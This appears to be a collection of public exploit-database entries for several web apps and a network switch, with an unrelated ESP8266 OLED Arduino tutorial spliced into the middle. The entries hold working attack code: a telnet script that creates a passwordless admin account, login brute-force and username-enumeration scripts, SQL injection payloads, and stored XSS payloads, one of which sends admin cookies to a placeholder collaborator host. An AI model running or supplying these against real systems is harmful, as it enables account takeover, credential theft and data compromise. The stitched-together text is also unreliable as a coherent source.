# Exploit Title: FS-S3900-24T4S Privilege Escalation # Date: 29/04/2023 # Exploit Author: Daniele Linguaglossa & Alberto Bruscino # Vendor Homepage: https://www.fs.com/ # Software Link: not available # Version: latest # Tested on: latest # CVE : CVE-2023-30350 import sys import telnetlib def exploit(args): print(args) if len(args) != 1: print(f"Usage: {sys.argv[0]} <ip>") sys.exit(1) else: ip = args[0] try: with telnetlib.Telnet(ip, 23) as tn: try: tn.read_until(b"Username: ") tn.write(b"guest\r\n") tn.read_until(b"Password: ") tn.write(b"guest\r\n") tn.read_until(b">") tn.write(b"enable\r\n") tn.read_until(b"Password: ") tn.write(b"super\r\n") tn.read_until(b"#") tn.write(b"configure terminal\r\n") tn.read_until(b"(config)#") tn.write(b"username admin nopassword\r\n") tn.read_until(b"(config)#") print( "Exploit success, you can now login with username: admin and password: <empty>") tn.close() except KeyboardInterrupt: print("Exploit failed") tn.close() except ConnectionRefusedError: print("Connection refused") if __name__ == "__main__": exploit(sys.argv[1:])

# Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force # Date: 2023-04-28 # Exploit Author: abhhi (Abhishek Birdawade) # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz # Version: 7.0.1 # Tested on: Windows ''' Example Usage: - python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt ''' import requests import sys import argparse, textwrap from pwn import * #Expected Arguments parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt''')) parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") parser.add_argument("-u","--username", help="Username to Bruteforce for.") parser.add_argument("-ul","--userlist", help="Username Dictionary") parser.add_argument("-p","--passlist", help="Password Dictionary") args = parser.parse_args() if len(sys.argv) < 2: print (f"Exploit Usage: python3 exploitBF.py -h") sys.exit(1) # Variable LoginPage = args.url Username = args.username Username_list = args.userlist Password_list = args.passlist log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ') def login(Username,Password): session = requests.session() r = session.get(LoginPage) # Progress Check process = log.progress('Brute Force') #Specifying Headers Value headerscontent = { 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Referer' : f"{LoginPage}", 'Origin' : f"{LoginPage}", } #POST REQ data postreqcontent = { 'new_login_session_management' : 1, 'languageChoice' : 1, 'authUser' : f"{Username}", 'clearPass' : f"{Password}" } #Sending POST REQ r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False) #Printing Username:Password process.status('Testing -> {U}:{P}'.format(U = Username, P = Password)) #Conditional loops if 'Location' in r.headers: if "/interface/main/tabs/main.php" in r.headers['Location']: print() log.info(f'SUCCESS !!') log.success(f"Use Credential -> {Username}:{Password}") sys.exit(0) #Reading User.txt & Pass.txt files if Username_list: userfile = open(Username_list).readlines() for Username in userfile: Username = Username.strip() passfile = open(Password_list).readlines() for Password in passfile: Password = Password.strip() login(Username,Password)

# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS) # Date: 2023-04-29 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.phpjabbers.com/faq.php # Software Link: https://www.phpjabbers.com/simple-cms/ # Version: 5.0 # Tested on: Kali Linux ### Steps to Reproduce ### - Please login from this address: https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin - Click on the "Add Section" button. - Then enter the payload ("><img src=x onerror=alert("Stored")>) in the "Section" box and save it. - Boom! An alert message saying "Stored" will appear in front of you. ### PoC Request ### POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate HTTP/1.1 Host: localhost Cookie: pj_sid=PJ1.0.6199026527.1682777172; pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1; PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1; pjd=7l9bb4ubmknrdbns46j7g5cqn7 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 371 Origin: https://localhost Referer: https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T

Equipment List esp8266 development board oled (0.96) DuPont Line Equipment circuit diagram Add library u8g2 library file Project 1 Hello World /* HelloWorld.ino esp8266+oled project example Forum: bbskali.cn Blog: blog.bbskali.cn */ #include Arduino.h #include U8g2lib.h #ifdef U8X8_HAVE_HW_SPI #include SPI.h #endif #ifdef U8X8_HAVE_HW_I2C #include Wire.h #endif U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //Here D1 D2 is the corresponding welding pin void setup(void) { u8g2.begin(); } void loop(void) { u8g2.clearBuffer(); //clear the internal memory u8g2.setFont(u8g2_font_ncenB08_tr); //choose a suitable font u8g2.drawStr(0,10,'Hello World!'); //write something to the internal memory u8g2.sendBuffer(); //transfer internal memory to the display delay(1000); }The effect is as follows The code of Item 2 Display Chinese characters is as follows: /* esp8266+oled display Show Chinese character items Forum address: bbskali.cn Blog: blog.bbskali.cn */ #include Arduino.h #include U8g2lib.h #ifdef U8X8_HAVE_HW_SPI #include SPI.h #endif #ifdef U8X8_HAVE_HW_I2C #include Wire.h #endif U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //All Boards without Reset of the Display void setup(void) { u8g2.begin(); u8g2.enableUTF8Print(); //enable UTF8 support for the Arduino print() function } void loop(void) { u8g2.setFont(u8g2_font_unifont_t_chinese2); //use chinese2 for all the glyphs of 'Hello world' u8g2.setFontDirection(0); u8g2.clearBuffer(); u8g2.setCursor(0, 15); u8g2.print('kali forum'); u8g2.setCursor(0, 30); u8g2.print('bbskali.cn'); //Chinese 'Hello World' u8g2.setCursor(0, 45); u8g2.print('kali Hacker Teaching'); u8g2.sendBuffer(); delay(1000); }The effects are as follows: The code of Item 3 Display multiple lines of text is as follows: /* */ #include Arduino.h #include U8g2lib.h #ifdef U8X8_HAVE_HW_SPI #include SPI.h #endif #ifdef U8X8_HAVE_HW_I2C #include Wire.h #endif U8G2_SSD1306_128X64_NONAME_1_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //All Boards without Reset of the Display #define FONT u8g2_font_wqy14_t_gb2312b //#define FONT u8g2_font_wqy16_t_chinese1 //#define FONT u8g2_font_wqy16_t_gb2312b //The next two macros define the scroll speed of the short story #define SCROLL_DELTA 2 #define SCROLL_DELAY 200 const char c_str[]= 'Shen Nong\n\n' 'KALI Forum Introduction\n' 'kali forum was created at 20\n' '17, Webmaster Priess\n' 'This forum is based on kali' 'Full Research and Cybersecurity\n' 'For the convenience of friends' learning\n' 'We built this forum\n' 'Forum study is completely free\n' 'Our URL :\n' 'bbskali,cn\n' 'WeChat official account:\n' '【kali Hacker Teaching】\n' 'Thank you for your attention. \n'; char buf[48]; //there are at most 8 chinese glyphs per line, max buf size is 8*3=24 uint8_t total_lines; //the total number of lines in the story uint8_t i; //loop variable for the lines uint8_t line_cnt; //number of lines to draw, usually equal to lines_per_draw uint8_t start_line; //topmost visible line, derived from top_window_pos uint8_t lines_per_draw; //how many lines to draw on the screen, derived from font and display height uint16_t glyph_height; //height of the glyphs uint16_t top_window_pos; //defines the display position in pixel within the text uint16_t total_height; //total height in pixel, derived from font height and total_lines u8g2_uint_t top_offset; //offset between the first visible line and the display void setup(void) { /* U8g2 Project: SSD1306 Test Board */ pinMode(D2, OUTPUT); pinMode(D1, OUTPUT); digitalWrite(10, 0); digitalWrite(9, 0); /* U8g2 Project: T6963 Test Board */ //pinMode(18, OUTPUT); //digitalWrite(18, 1); /* U8g2 Project: KS0108 Test Board */ //pinMode(16, OUTPUT); //digitalWrite(16, 0); /* U8g2 Project: LC7981 Test Board, connect RW to GND */ //pinMode(17, OUTPUT); //digitalWrite(17, 0); /* U8g2 Project: Pax Instruments Shield: Enable Backlight */ //pinMode(6, OUTPUT); //digitalWrite(6, 0); u8g2.begin(); /* select a font */ //u8g2.setFont(u8g2_font_wqy12_t_chinese1); //two unknown glyphs //u8g2.setFont(u8g2_font_wqy12_t_chinese3); //two unknown glyphs //u8g2.setFont(u8g2_font_wqy12_t_gb2312a); //';' is missing //u8g2.setFont(u8g2_font_wqy12_t_gb2312b); //all glyphs available u8g2.setFont(FONT); /* calculate the length of the text in lines */ total_lines=u8x8_GetStringLineCnt(c_str); /* get the height of the glyphs */ glyph_height=u8g2.getMaxCharHeight(); /* calculate the height of the text in pixel */ total_height=(uint16_t)total_lines * (uint16_t)glyph_height; /* calculate how many lines must be drawn on the screen */ lines_per_draw=u8g2.getDisplayHeight()/glyph_height; lines_per_draw +=2; /* start at the top of the text */ top_window_pos=0; } void loop(void) { start_line=top_window_pos/glyph_height; top_offset=top_window_pos %glyph_height; line_cnt=total_lines - start_line; if ( line_cnt lines_per_draw ) line_cnt=lines_per_draw; u8g2.firstPage(); do { for( i=0; i line_cnt; i++ ) { /* copy a line of the text to the local buffer */ u8x8_CopyStringLine(buf, i+start_line, c_str); /* draw the content of the local buffer */ u8g2.drawUTF8(0, i*glyph_height-top_offset +glyph_height, buf); } } while ( u8g2.nextPage() ); delay(SCROLL_DELAY); top_window_pos +=SCROLL_DELTA; }

# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection # Date: 2023-04-29 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.phpjabbers.com/faq.php # Software Link: https://www.phpjabbers.com/simple-cms/ # Version: 5.0 # Tested on: Kali Linux ### Request ### GET /simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 HTTP/1.1 Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost/simplecms/preview.php?lid=1 Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844; _fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292; pjd_simplecms=1; last_position=%2F Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive ### Parameter & Payloads ### Parameter: column (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869) THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: action=pjActionGetFile&column=2 AND EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT (ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

# Exploit Title: GLPI 9.5.7 - Username Enumeration # Date: 04/29/2023 # Author: Rafael B. # Vendor Homepage: https://glpi-project.org/pt-br/ # Affected Versions: GLPI version 9.1 <= 9.5.7 # Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz import requests from bs4 import BeautifulSoup # Send a GET request to the page to receive the csrf token and the cookie session response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1') # Parse the HTML using BeautifulSoup soup = BeautifulSoup(response.content, 'html.parser') # Find the input element with the CSRF token csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')}) # Extract the CSRF token if it exists if csrf_input: csrf_token = csrf_input['value'] # Extract the session cookie session_cookie_value = None if response.cookies: session_cookie_value = next(iter(response.cookies.values())) # Set the custom url where the GLPI recover password is located url = "http://127.0.0.1:80/glpi/front/lostpassword.php" headers = {"User-Agent": "Windows NT 10.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} # Open the email list file and read each line with open('emails.txt', 'r') as f: email_list = f.readlines() # Loop through the email list and make a POST request for each email for email in email_list: email = email.strip() data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token} cookies = {"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value} freq = requests.post(url, headers=headers, cookies=cookies, data=data) # Do a new GET request to get the updated CSRF token and session cookie for the next iteration response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1') soup = BeautifulSoup(response.content, 'html.parser') csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')}) if csrf_input: csrf_token = csrf_input['value'] session_cookie_value = None if response.cookies: session_cookie_value = next(iter(response.cookies.values())) # Parse the response and grep the match e-mails soup = BeautifulSoup(freq.content, 'html.parser') div_center = soup.find('div', {'class': 'center'}) Result = (f"Email: {email}, Result: {div_center.text.strip()}") if "An email has been sent to your email address. The email contains information for reset your password." in Result: print ("\033[1;32m Email Found! -> " + Result)

Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS) Application: pluck Version: 4.7.18 Bugs: XSS Technology: PHP Vendor URL: https://github.com/pluck-cms/pluck Software Link: https://github.com/pluck-cms/pluck Date of found: 01-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. create .svg file. 2. svg file content: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> 3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files) poc request POST /pluck-4.7.18/admin.php?action=files HTTP/1.1 Host: localhost Content-Length: 672 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/pluck-4.7.18/admin.php?action=files Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de Connection: close ------WebKitFormBoundaryJMTiFxESCx7aNqmI Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryJMTiFxESCx7aNqmI Content-Disposition: form-data; name="submit" Upload ------WebKitFormBoundaryJMTiFxESCx7aNqmI-- 4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg

# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS) # Date: 27.04.2023 # Exploit Author: Lucas Noki (0xPrototype) # Vendor Homepage: https://github.com/vogtmh # Software Link: https://github.com/vogtmh/cmaps # Version: 8.0 # Tested on: Mac, Windows, Linux # CVE : CVE-2023-29983 *Steps to reproduce:* 1. Clone the repository and install the application 2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token= 3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script> 4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough. 5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog 6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter In a real world case you would need to wait for the admin to log into the application and open the auditlog tab. Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.